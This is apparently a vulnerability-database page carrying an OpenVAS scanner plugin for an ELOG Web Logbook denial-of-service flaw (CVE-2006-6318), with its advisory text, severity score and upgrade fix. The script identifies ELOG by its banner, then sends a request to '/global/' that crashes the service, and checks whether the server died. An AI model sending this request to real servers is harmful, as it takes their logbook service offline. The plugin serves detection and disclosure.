Lucene search

K
openvasThis script is Copyright (C) 2006 Justin SeitzOPENVAS:80056
HistoryOct 24, 2008 - 12:00 a.m.

ELOG Web LogBook global Denial of Service

2008-10-2400:00:00
This script is Copyright (C) 2006 Justin Seitz
plugins.openvas.org
13

EPSS

0.063

Percentile

93.6%

The remote web server is affected by a denial of service issue.

Description :

The remote web server is identified as ELOG Web Logbook, an open
source blogging software.

The version of ELOG Web Logbook installed on the remote host is
vulnerable to a denial of service attack by requesting ‘/global’ or
any logbook with ‘global’ in its name. When a request like this is
received, a NULL pointer dereference occurs, leading to a crash of the
service.

# OpenVAS Vulnerability Test
# $Id: elog_logbook_global_dos.nasl 5390 2017-02-21 18:39:27Z mime $
# Description: ELOG Web LogBook global Denial of Service
#
# Authors:
# Justin Seitz <[email protected]>
#
# Copyright:
# Copyright (C) 2006 Justin Seitz
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_solution = "Upgrade to ELOG version 2.6.2-7 or later.

CVSS Base Score : 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)";

tag_summary = "The remote web server is affected by a denial of service issue. 

Description :

The remote web server is identified as ELOG Web Logbook, an open
source blogging software. 

The version of ELOG Web Logbook installed on the remote host is
vulnerable to a denial of service attack by requesting '/global' or
any logbook with 'global' in its name.  When a request like this is
received, a NULL pointer dereference occurs, leading to a crash of the
service.";


if(description) {
	script_id(80056);;
	script_version("$Revision: 5390 $");
	script_tag(name:"last_modification", value:"$Date: 2017-02-21 19:39:27 +0100 (Tue, 21 Feb 2017) $");
	script_tag(name:"creation_date", value:"2008-10-24 23:33:44 +0200 (Fri, 24 Oct 2008)");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");

	script_cve_id("CVE-2006-6318");
	script_bugtraq_id(21028);
	script_xref(name:"OSVDB", value:"30272");

	name = "ELOG Web LogBook global Denial of Service";
	summary = "Tries to crash the remote service.";
	family = "Web application abuses";

	script_name(name);

	script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_vul");
	script_copyright("This script is Copyright (C) 2006 Justin Seitz");

	script_family(family);

	script_dependencies("gb_get_http_banner.nasl");
	script_require_ports("Services/www", 8080);
        script_mandatory_keys("ELOG_HTTP/banner");
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name : "solution" , value : tag_solution);
 script_xref(name : "URL" , value : "http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0198.html");
 script_xref(name : "URL" , value : "http://savannah.psi.ch/websvn/log.php?repname=elog&path=/trunk/&rev=1749&sc=1&isdir=1");
 script_xref(name : "URL" , value : "http://midas.psi.ch/elogs/Forum/2053");
	exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

#
#
#	Verify we can talk to the web server either on port 8080 (the default).
#
#

port = get_http_port(default:8080);
if(!get_port_state(port)) exit(0);
if (http_is_dead(port:port)) exit(0);

#
#
#	Verify its ELOG and send the DOS if it is.
#
#

banner = get_http_banner(port:port);
if (!isnull(banner) && "Server: ELOG HTTP" >< banner) {

	uri = "/global/";
	attackreq = http_get(port:port, item:uri);
	attackres = http_send_recv(port:port, data:attackreq);

	#
	#
	#	Try to connect to the web server, if you can't you know its busted.
	#
	#

	if(http_is_dead(port:port))
		security_message(port);	
}

EPSS

0.063

Percentile

93.6%